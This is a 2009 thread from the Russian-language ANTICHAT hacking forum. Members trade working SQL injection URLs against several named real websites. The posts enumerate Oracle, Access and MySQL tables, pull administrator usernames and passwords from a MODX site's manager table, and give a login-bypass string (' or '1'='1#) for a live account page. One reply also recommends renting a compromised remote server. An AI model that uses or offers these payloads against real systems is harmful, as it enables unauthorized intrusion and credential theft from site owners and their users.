ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.08.2009, 19:57
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Сообщение от Saiga
2 z00MAN
Блин я не могу запустить, нету прав админа на компе (((. попробовал : madnet.name/tools/madss/ ..... ничего не показал. Есть что нибудь еще ?
заюзай дедик стоит 1-3 бакса
|
|
|
20.08.2009, 16:30
|
|
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726
Репутация:
368
|
|
помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)
http://www.kstu.ru/1leveltest.jsp?idparent=189+select+union+null+from +SYS.DUAL
|
|
|
|
20.08.2009, 17:23
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от edge911
помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)
Гнусный оракл 
http://www.kstu.ru/al_spis_sotr.jsp?first=9'+union+select+null,table_ name,null,null,null,null,null+from+sys.all_tables--+
|
|
|
|
20.08.2009, 18:33
|
|
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551
Репутация:
13
|
|
del
Последний раз редактировалось fraIzer; 20.08.2009 в 21:18..
|
|
|
|
20.08.2009, 18:35
|
|
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726
Репутация:
368
|
|
Microsoft JET Database
http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+golovoi_op_ stenu
не как не могу подобрать таблицу =(
Последний раз редактировалось edge911; 20.08.2009 в 18:37..
|
|
|
|
20.08.2009, 18:47
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+user
|
|
|
|
20.08.2009, 18:53
|
|
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726
Репутация:
368
|
|
http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+user
уверен ?
"select ... from user" использоваться нельзя, так как user это внутреннее имя и таблицой оно быть не может.
_http://forum.antichat.ru/threadnav50550-3-10.html
Последний раз редактировалось edge911; 20.08.2009 в 18:58..
|
|
|
|
20.08.2009, 18:58
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
К MSysObjects доступа нет, так что только перебором
Кста там обход авторизации возможен http://www.bestperiodica.com/MyAccount.asp
В E-mail ' or '1'='1#
в пароль что угодно
|
|
|
|
20.08.2009, 19:10
|
|
Новичок
Регистрация: 17.08.2009
Сообщений: 11
Провел на форуме:
25459
Репутация:
3
|
|
sql inj
короче, есть бажный сайт:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,2/*
в нем столько табличек:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+all+select+1,table_name+from+informati on_schema.tables+limit+86,1/*
самые интересные это:
modx_active_users -тридцатая
modx_manager_users -37
modx_web_users -66
из них получаем столбцы:
username
password
но когда я хочу просмотреть эти столбцы вводя например вот это:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_man ager_users+limit+1,1/*
то никакого имени и пароля не получается!
может я не так что-то делаю, помогите кто может.
|
|
|
|
20.08.2009, 19:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
lucky_guy, выводи во 2ое поле...
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,concat_ws(0x3a,id,username,pa ssword)+from+modx_manager_users/*
Последний раз редактировалось RulleR; 20.08.2009 в 19:40..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
